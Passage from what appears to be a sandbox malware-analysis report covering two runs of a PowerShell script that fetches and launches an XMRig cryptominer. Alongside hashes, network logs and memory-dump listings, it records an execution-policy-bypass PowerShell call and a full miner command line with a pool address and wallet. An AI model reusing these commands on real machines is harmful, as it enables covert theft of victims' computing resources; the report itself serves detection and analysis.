memory/4152-103-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-104-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-105-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-106-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-107-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-108-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-109-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-110-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-111-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-112-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-113-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-114-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-115-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-116-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-117-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-118-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-119-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-120-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-121-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-122-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-123-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-124-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-125-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-126-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-127-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-128-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-129-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-130-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-131-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-132-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-133-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-134-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-135-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-136-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-137-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-138-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-139-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-140-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-141-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-142-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-143-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-144-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-145-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-146-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-147-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-148-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-149-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-150-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-151-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-152-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-153-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-154-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-155-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-156-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-157-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:07
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1776s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 100 wrote to memory of 972 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 100 wrote to memory of 972 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
memory/100-0-0x00007FFED2853000-0x00007FFED2855000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ywfdp3qn.nmu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/100-10-0x0000014609C70000-0x0000014609C92000-memory.dmp
memory/100-11-0x00007FFED2850000-0x00007FFED3311000-memory.dmp
memory/100-12-0x00007FFED2850000-0x00007FFED3311000-memory.dmp
memory/100-14-0x00007FFED2850000-0x00007FFED3311000-memory.dmp
memory/100-15-0x0000014609CE0000-0x0000014609CF2000-memory.dmp
memory/100-16-0x0000014609B40000-0x0000014609B4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/972-47-0x00000193EDE00000-0x00000193EDE20000-memory.dmp
memory/972-48-0x00000193EDE50000-0x00000193EDE70000-memory.dmp
memory/972-49-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/100-50-0x00007FFED2853000-0x00007FFED2855000-memory.dmp
memory/972-51-0x00000193EF630000-0x00000193EF650000-memory.dmp
memory/972-52-0x00000193EF650000-0x00000193EF670000-memory.dmp
memory/100-54-0x00007FFED2850000-0x00007FFED3311000-memory.dmp
memory/972-53-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-55-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/100-56-0x00007FFED2850000-0x00007FFED3311000-memory.dmp
memory/972-57-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-58-0x00000193EF630000-0x00000193EF650000-memory.dmp
memory/972-59-0x00000193EF650000-0x00000193EF670000-memory.dmp
memory/972-60-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-61-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-62-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-63-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-64-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-65-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-66-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-67-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-68-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-69-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-70-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-71-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-72-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-73-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-74-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-75-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-76-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-77-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-78-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-79-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-80-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-81-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-82-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-83-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-84-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-85-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-86-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-87-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-88-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-89-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-90-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-91-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-92-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-93-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-94-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-95-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-96-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-97-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-98-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-99-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-100-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-101-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-102-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-103-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-104-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-105-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-106-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-107-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-108-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-109-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-110-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-111-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-112-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-113-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-114-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-115-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-116-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-117-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
memory/972-118-0x00007FF64BEF0000-0x00007FF64CB23000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:19
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4076 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4076 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/4076-3-0x00007FFC8AAB3000-0x00007FFC8AAB4000-memory.dmp
memory/4076-5-0x000001D78E9D0000-0x000001D78E9F2000-memory.dmp
memory/4076-8-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp
memory/4076-9-0x000001D7A6FD0000-0x000001D7A7046000-memory.dmp
memory/4076-10-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w35g4bz2.wdd.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4076-25-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp
memory/4076-61-0x000001D7A6FC0000-0x000001D7A6FCA000-memory.dmp
memory/4076-48-0x000001D7A7250000-0x000001D7A7262000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4380-90-0x000001EF3F680000-0x000001EF3F6A0000-memory.dmp
memory/4380-91-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-92-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4076-93-0x00007FFC8AAB3000-0x00007FFC8AAB4000-memory.dmp
memory/4076-94-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp
memory/4076-95-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp
memory/4380-96-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-97-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-98-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-99-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-100-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-101-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-102-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-103-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-104-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-105-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-106-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-107-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-108-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-109-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-110-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-111-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-112-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-113-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-114-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-115-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-116-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-117-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-118-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-119-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-120-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-121-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-122-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-123-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-124-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-125-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-126-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-127-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-128-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-129-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-130-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-131-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-132-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-133-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-134-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-135-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-136-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
memory/4380-137-0x00007FF6FEC90000-0x00007FF6FF8C3000-memory.dmp
